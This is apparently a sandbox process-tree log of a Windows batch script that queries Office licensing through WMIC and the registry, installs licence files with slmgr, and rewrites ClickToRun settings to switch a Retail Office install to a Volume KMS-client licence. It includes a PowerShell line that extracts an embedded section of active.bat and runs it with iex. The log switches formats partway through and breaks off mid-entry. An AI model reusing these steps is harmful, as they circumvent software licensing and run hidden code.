C:\Windows\system32\find.exefind /i "Office16SkypeforBusinessR" "C:\Windows\Temp\sppchk.txt"3⤵PID:640
C:\Windows\system32\find.exefind /i "Office16ExcelR" "C:\Windows\Temp\sppchk.txt"3⤵PID:5756
C:\Windows\system32\find.exefind /i "Office16OutlookR" "C:\Windows\Temp\sppchk.txt"3⤵PID:5632
C:\Windows\system32\find.exefind /i "Office16PowerPointR" "C:\Windows\Temp\sppchk.txt"3⤵PID:5772
C:\Windows\system32\find.exefind /i "Office16PublisherR" "C:\Windows\Temp\sppchk.txt"3⤵PID:664
C:\Windows\system32\find.exefind /i "Office16WordR" "C:\Windows\Temp\sppchk.txt"3⤵PID:5876
C:\Windows\system32\find.exefind /i "Office16ProfessionalR" "C:\Windows\Temp\sppchk.txt"3⤵PID:5892
C:\Windows\system32\find.exefind /i "Office16HomeBusinessR" "C:\Windows\Temp\sppchk.txt"3⤵PID:5948
C:\Windows\system32\find.exefind /i "Office16HomeStudentR" "C:\Windows\Temp\sppchk.txt"3⤵PID:5824
C:\Windows\system32\find.exefind /i "Office16ProjectProR" "C:\Windows\Temp\sppchk.txt"3⤵PID:5868
C:\Windows\system32\find.exefind /i "Office16ProjectStdR" "C:\Windows\Temp\sppchk.txt"3⤵PID:5848
C:\Windows\system32\find.exefind /i "Office16VisioProR" "C:\Windows\Temp\sppchk.txt"3⤵PID:5856
C:\Windows\system32\find.exefind /i "Office16VisioStdR" "C:\Windows\Temp\sppchk.txt"3⤵PID:5812
C:\Windows\system32\sc.exesc query ClickToRunSvc3⤵
- Launches sc.exe
PID:5984
C:\Windows\system32\sc.exesc query OfficeSvc3⤵
- Launches sc.exe
PID:5964
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:6088 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath4⤵
- Modifies registry key
PID:6112
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\ClickToRun /v InstallPath" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:5924 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\ClickToRun /v InstallPath4⤵
- Modifies registry key
PID:5732
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\15.0\ClickToRun /v InstallPath" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:5140 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\15.0\ClickToRun /v InstallPath4⤵
- Modifies registry key
PID:6020
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\15.0\ClickToRun /v InstallPath" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:6012 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\15.0\ClickToRun /v InstallPath4⤵
- Modifies registry key
PID:6048
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:6044 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath4⤵
- Modifies registry key
PID:6136
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:5164 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath4⤵
- Modifies registry key
PID:5212
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v PackageGUID" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:4356 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v PackageGUID4⤵
- Modifies registry key
PID:3156
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:1712 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds4⤵
- Modifies registry key
PID:3592
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs /v ActiveConfiguration" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:1304 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs /v ActiveConfiguration4⤵
- Modifies registry key
PID:1060
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\15.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:5160 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\15.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:5148
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\15.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:3888 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\15.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:228
-
-
-
[depth 3] PID:388  C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingService get Version /value
    - System Location Discovery: System Language Discovery
    [depth 4] PID:5304  C:\Windows\system32\Wbem\WMIC.exe
        wmic path SoftwareLicensingService get Version /value
[depth 3] PID:2812  C:\Windows\system32\Wbem\WMIC.exe
    wmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663' AND LicenseStatus='1' AND PartialProductKey is not NULL" get Description
[depth 3] PID:5312  C:\Windows\system32\findstr.exe
    findstr /V /R "^$"
[depth 3] PID:4984  C:\Windows\system32\find.exe
    find /i "RETAIL channel" "C:\Windows\Temp\crvRetail.txt"
[depth 3] PID:4360  C:\Windows\system32\find.exe
    find /i "RETAIL(MAK) channel" "C:\Windows\Temp\crvRetail.txt"
[depth 3] PID:1236  C:\Windows\system32\find.exe
    find /i "TIMEBASED_SUB channel" "C:\Windows\Temp\crvRetail.txt"
[depth 3] PID:5192  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    powershell -nop -c "$f=[IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\active.bat') -split ':embdbin\:.*';iex ($f[5])"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
[depth 3] PID:4072  C:\Windows\system32\Wbem\WMIC.exe
    wmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663'" get LicenseFamily
[depth 3] PID:5764  C:\Windows\system32\findstr.exe
    findstr /V /R "^$"
[depth 3] PID:3316  C:\Windows\system32\findstr.exe
    findstr /I /C:"Professional2024Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5772  C:\Windows\system32\findstr.exe
    findstr /I /C:"HomeBusiness2024Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:664  C:\Windows\system32\findstr.exe
    findstr /I /C:"HomeStudent2024Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:3452  C:\Windows\system32\findstr.exe
    findstr /I /C:"Home2024Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5376  C:\Windows\system32\findstr.exe
    findstr /I /C:"ProPlus2024Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5904  C:\Windows\system32\findstr.exe
    findstr /I /C:"Standard2024Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5908  C:\Windows\system32\findstr.exe
    findstr /I /C:"Excel2024Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5796  C:\Windows\system32\findstr.exe
    findstr /I /C:"Outlook2024Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5864  C:\Windows\system32\findstr.exe
    findstr /I /C:"PowerPoint2024Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5920  C:\Windows\system32\findstr.exe
    findstr /I /C:"Word2024Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5792  C:\Windows\system32\findstr.exe
    findstr /I /C:"Access2024Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5808  C:\Windows\system32\findstr.exe
    findstr /I /C:"SkypeforBusiness2024Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5800  C:\Windows\system32\findstr.exe
    findstr /I /C:"ProjectPro2024Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5960  C:\Windows\system32\findstr.exe
    findstr /I /C:"ProjectStd2024Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5964  C:\Windows\system32\findstr.exe
    findstr /I /C:"VisioPro2024Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:6108  C:\Windows\system32\findstr.exe
    findstr /I /C:"VisioStd2024Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:6088  C:\Windows\system32\findstr.exe
    findstr /I /C:"Professional2021Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5732  C:\Windows\system32\findstr.exe
    findstr /I /C:"HomeBusiness2021Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5924  C:\Windows\system32\findstr.exe
    findstr /I /C:"HomeStudent2021Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5976  C:\Windows\system32\findstr.exe
    findstr /I /C:"ProPlus2021Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5140  C:\Windows\system32\findstr.exe
    findstr /I /C:"Standard2021Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:6048  C:\Windows\system32\findstr.exe
    findstr /I /C:"Excel2021Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:6012  C:\Windows\system32\findstr.exe
    findstr /I /C:"Outlook2021Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5144  C:\Windows\system32\findstr.exe
    findstr /I /C:"PowerPoint2021Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:6044  C:\Windows\system32\findstr.exe
    findstr /I /C:"Publisher2021Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5232  C:\Windows\system32\findstr.exe
    findstr /I /C:"Word2021Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5164  C:\Windows\system32\findstr.exe
    findstr /I /C:"Access2021Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:6024  C:\Windows\system32\findstr.exe
    findstr /I /C:"SkypeforBusiness2021Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:4356  C:\Windows\system32\findstr.exe
    findstr /I /C:"ProjectPro2021Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:2760  C:\Windows\system32\findstr.exe
    findstr /I /C:"ProjectStd2021Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:1712  C:\Windows\system32\findstr.exe
    findstr /I /C:"VisioPro2021Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:3744  C:\Windows\system32\findstr.exe
    findstr /I /C:"VisioStd2021Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:1304  C:\Windows\system32\findstr.exe
    findstr /I /C:"Professional2019Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:1940  C:\Windows\system32\findstr.exe
    findstr /I /C:"HomeBusiness2019Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5168  C:\Windows\system32\findstr.exe
    findstr /I /C:"HomeStudent2019Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:2372  C:\Windows\system32\findstr.exe
    findstr /I /C:"ProPlus2019Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:928  C:\Windows\system32\findstr.exe
    findstr /I /C:"Standard2019Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5292  C:\Windows\system32\findstr.exe
    findstr /I /C:"Excel2019Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5248  C:\Windows\system32\findstr.exe
    findstr /I /C:"Outlook2019Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:4888  C:\Windows\system32\findstr.exe
    findstr /I /C:"PowerPoint2019Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5620  C:\Windows\system32\findstr.exe
    findstr /I /C:"Publisher2019Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5516  C:\Windows\system32\findstr.exe
    findstr /I /C:"Word2019Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:2260  C:\Windows\system32\findstr.exe
    findstr /I /C:"Access2019Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:1808  C:\Windows\system32\findstr.exe
    findstr /I /C:"SkypeforBusiness2019Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:3476  C:\Windows\system32\findstr.exe
    findstr /I /C:"ProjectPro2019Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:4852  C:\Windows\system32\findstr.exe
    findstr /I /C:"ProjectStd2019Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:4452  C:\Windows\system32\findstr.exe
    findstr /I /C:"VisioPro2019Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:112  C:\Windows\system32\findstr.exe
    findstr /I /C:"VisioStd2019Retail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:2812  C:\Windows\system32\findstr.exe
    findstr /I /C:"ProfessionalRetail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:4860  C:\Windows\system32\findstr.exe
    findstr /I /C:"HomeBusinessRetail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5368  C:\Windows\system32\findstr.exe
    findstr /I /C:"HomeStudentRetail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5132  C:\Windows\system32\findstr.exe
    findstr /I /C:"O365ProPlusRetail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:4372  C:\Windows\system32\findstr.exe
    findstr /I /C:"O365BusinessRetail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5420  C:\Windows\system32\findstr.exe
    findstr /I /C:"O365SmallBusPremRetail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5432  C:\Windows\system32\findstr.exe
    findstr /I /C:"O365HomePremRetail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5480  C:\Windows\system32\findstr.exe
    findstr /I /C:"O365EduCloudRetail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:1952  C:\Windows\system32\findstr.exe
    findstr /I /C:"MondoRetail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5592  C:\Windows\system32\findstr.exe
    findstr /I /C:"StandardRetail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5472  C:\Windows\system32\findstr.exe
    findstr /I /C:"ExcelRetail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5500  C:\Windows\system32\findstr.exe
    findstr /I /C:"OutlookRetail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5596  C:\Windows\system32\findstr.exe
    findstr /I /C:"PowerPointRetail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5604  C:\Windows\system32\findstr.exe
    findstr /I /C:"PublisherRetail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:692  C:\Windows\system32\findstr.exe
    findstr /I /C:"WordRetail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5332  C:\Windows\system32\findstr.exe
    findstr /I /C:"AccessRetail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5748  C:\Windows\system32\findstr.exe
    findstr /I /C:"SkypeforBusinessRetail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5696  C:\Windows\system32\findstr.exe
    findstr /I /C:"ProjectProRetail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:3128  C:\Windows\system32\findstr.exe
    findstr /I /C:"ProjectStdRetail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5408  C:\Windows\system32\findstr.exe
    findstr /I /C:"VisioProRetail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:3160  C:\Windows\system32\findstr.exe
    findstr /I /C:"VisioStdRetail" "C:\Windows\Temp\crvProductIds.txt"
[depth 3] PID:5184  C:\Windows\system32\findstr.exe
    findstr /I /C:"OneNoteRetail" "C:\Windows\Temp\crvProductIds.txt"
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProPlus2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5392
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Standard2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5320
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Excel2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4840
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Outlook2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5648
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PowerPoint2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5676
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Publisher2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2924
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Word2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:920
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Access2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5020
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"SkypeforBusiness2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4040
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectPro2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4344
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStd2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1772
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioPro2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5784
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStd2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:640
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"MondoVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5636
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"StandardVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5768
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ExcelVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3316
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"OutlookVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5772
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PowerPointVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:6092
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PublisherVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4648
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"WordVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:6004
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"AccessVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5900
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"SkypeforBusinessVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5908
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectProVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5948
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStdVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5816
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioProVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5916
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStdVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5932
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"OneNoteVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5856
-
-
[depth 3] PID:5812  C:\Windows\system32\reg.exe
    reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\A9C88E0B-9DC8-47AB-AB89-9AE025316701\ProPlusRetail.16
    - Modifies registry key
[depth 3] PID:5984  C:\Windows\system32\find.exe
    find /i "Office16ProPlusVL_KMS_Client" "C:\Windows\Temp\crvVolume.txt"
[depth 3] PID:6016  C:\Windows\system32\reg.exe
    reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\A9C88E0B-9DC8-47AB-AB89-9AE025316701\ProPlusVolume.16
    - Modifies registry key
[depth 3] PID:6124  C:\Windows\system32\find.exe
    find /i "Office16MondoVL_KMS_Client" "C:\Windows\Temp\crvVolume.txt"
[depth 3] PID:5760  C:\Windows\system32\cscript.exe
    cscript.exe //NoLogo //B C:\Windows\Sysnative\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-bridge-office.xrm-ms"
[depth 3] PID:6008  C:\Windows\system32\cscript.exe
    cscript.exe //NoLogo //B C:\Windows\Sysnative\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-root-bridge-test.xrm-ms"
[depth 3] PID:6020  C:\Windows\system32\cscript.exe
    cscript.exe //NoLogo //B C:\Windows\Sysnative\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-root.xrm-ms"
[depth 3] PID:5140  C:\Windows\system32\cscript.exe
    cscript.exe //NoLogo //B C:\Windows\Sysnative\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-stil.xrm-ms"
[depth 3] PID:5172  C:\Windows\system32\cscript.exe
    cscript.exe //NoLogo //B C:\Windows\Sysnative\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-ul-oob.xrm-ms"
[depth 3] PID:6136  C:\Windows\system32\cscript.exe
    cscript.exe //NoLogo //B C:\Windows\Sysnative\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-ul.xrm-ms"
[depth 3] PID:5176  C:\Windows\system32\cscript.exe
    cscript.exe //NoLogo //B C:\Windows\Sysnative\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\pkeyconfig-office.xrm-ms"
[depth 3] PID:312  C:\Windows\system32\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /f /v ProPlus2019Volume.OSPPReady
    - Modifies registry key
[depth 3] PID:396  C:\Program Files\Microsoft Office\root\integration\Integrator.exe
    "C:\Program Files\Microsoft Office\root\integration\integrator.exe" /I /License PRIDName=ProPlus2019Volume.16 PackageGUID="9AC08E99-230B-47e8-9721-4577B7F124EA" PackageRoot="C:\Program Files\Microsoft Office\root"
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious use of SetWindowsHookEx
[depth 3] PID:2256  C:\Windows\system32\Wbem\WMIC.exe
    wmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663'" get LicenseFamily
[depth 3] PID:5036  C:\Windows\system32\find.exe
    find /i "ProPlus2019VL_"
[depth 3] PID:1852  C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /f /v ProPlus2019Volume.OSPPReady /t REG_SZ /d 1
    - Modifies registry key
[depth 3] PID:5520  C:\Windows\system32\reg.exe
    reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds
    - Modifies registry key
[depth 3] PID:5540  C:\Windows\system32\findstr.exe
    findstr /I "ProPlus2019Volume"
[depth 3] PID:4304  C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds
    - System Location Discovery: System Language Discovery
    [depth 4] PID:5076  C:\Windows\system32\reg.exe
        reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds
        - Modifies registry key
[depth 3] PID:1344  C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds /t REG_SZ /d "ProPlusRetail,ProPlus2019Volume" /f
    - Modifies registry key
[depth 3] PID:4568  C:\Windows\system32\reg.exe
    reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds
    - Modifies registry key
[depth 3] PID:3476  C:\Windows\system32\findstr.exe
    findstr 2019
[depth 3] PID:8  C:\Windows\system32\reg.exe
    reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds
    - Modifies registry key
[depth 3] PID:4452  C:\Windows\system32\findstr.exe
    findstr 2021
[depth 3] PID:5312  C:\Windows\system32\reg.exe
    reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds
    - Modifies registry key
[depth 3] PID:2812  C:\Windows\system32\findstr.exe
    findstr 2024
[depth 3] PID:2464  C:\Windows\system32\Wbem\WMIC.exe
    wmic path SoftwareLicensingService where Version='10.0.19041.1266' call RefreshLicenseStatus
[depth 3] PID:5416  C:\Windows\system32\reg.exe
    reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\msoxmled.exe"
[depth 3] PID:5476  C:\Windows\system32\Wbem\WMIC.exe
    wmic path SoftwareLicensingProduct where "Description like '%KMSCLIENT%' AND NOT Name like '%MondoR_KMS_Automation%'" get Name /value
[depth 3] PID:5464  C:\Windows\system32\find.exe
    find /i "Office 16" "C:\Windows\Temp\sppchk.txt"
[depth 3] PID:1952  C:\Windows\system32\find.exe
    find /i "Office 19" "C:\Windows\Temp\sppchk.txt"
[depth 3] PID:5592  C:\Windows\system32\Wbem\WMIC.exe
    wmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663' AND NOT Name like '%O365%'" get Name /value
[depth 3] PID:5556  C:\Windows\system32\find.exe
    find /i "R_Retail" "C:\Windows\Temp\sppchk.txt"
[depth 3] PID:5596  C:\Windows\system32\find.exe
    find /i "Office 14"
[depth 3] PID:5664  C:\Windows\system32\find.exe
    find /i "R_Retail" "C:\Windows\Temp\sppchk.txt"
[depth 3] PID:5576  C:\Windows\system32\find.exe
    find /i "Office 15"
[depth 3] PID:5660  C:\Windows\system32\find.exe
    find /i "R_Retail" "C:\Windows\Temp\sppchk.txt"
[depth 3] PID:5748  C:\Windows\system32\find.exe
    find /i "Office 16"
[depth 3] PID:5180  C:\Windows\system32\find.exe
    find /i "R_Retail" "C:\Windows\Temp\sppchk.txt"
[depth 3] PID:5108  C:\Windows\system32\find.exe
    find /i "Office 19"
[depth 3] PID:4664  C:\Windows\system32\find.exe
    find /i "R_Retail" "C:\Windows\Temp\sppchk.txt"
[depth 3] PID:4712  C:\Windows\system32\find.exe
    find /i "Office 21"
[depth 3] PID:5128  C:\Windows\system32\find.exe
    find /i "R_Retail" "C:\Windows\Temp\sppchk.txt"
[depth 3] PID:5184  C:\Windows\system32\find.exe
    find /i "Office 24"
[depth 3] PID:2756  C:\Windows\system32\Wbem\WMIC.exe
    wmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663' AND LicenseFamily like 'Office16O365%'" get LicenseFamily /value
[depth 3] PID:4508  C:\Windows\system32\find.exe
    find /i "O365"
[depth 3] PID:5700  C:\Windows\system32\Wbem\WMIC.exe
    wmic path SoftwareLicensingProduct where "Description like '%KMSCLIENT%'" get Name /value
[depth 3] PID:5676  C:\Windows\system32\findstr.exe
    findstr /i Windows
[depth 3] PID:5364  C:\Windows\system32\Wbem\WMIC.exe
    wmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' and PartialProductKey is not NULL" get Name /value
[depth 3] PID:5404  C:\Windows\system32\findstr.exe
    findstr /i Windows
[depth 3] PID:3740  C:\Windows\SysWOW64\cmd.exe
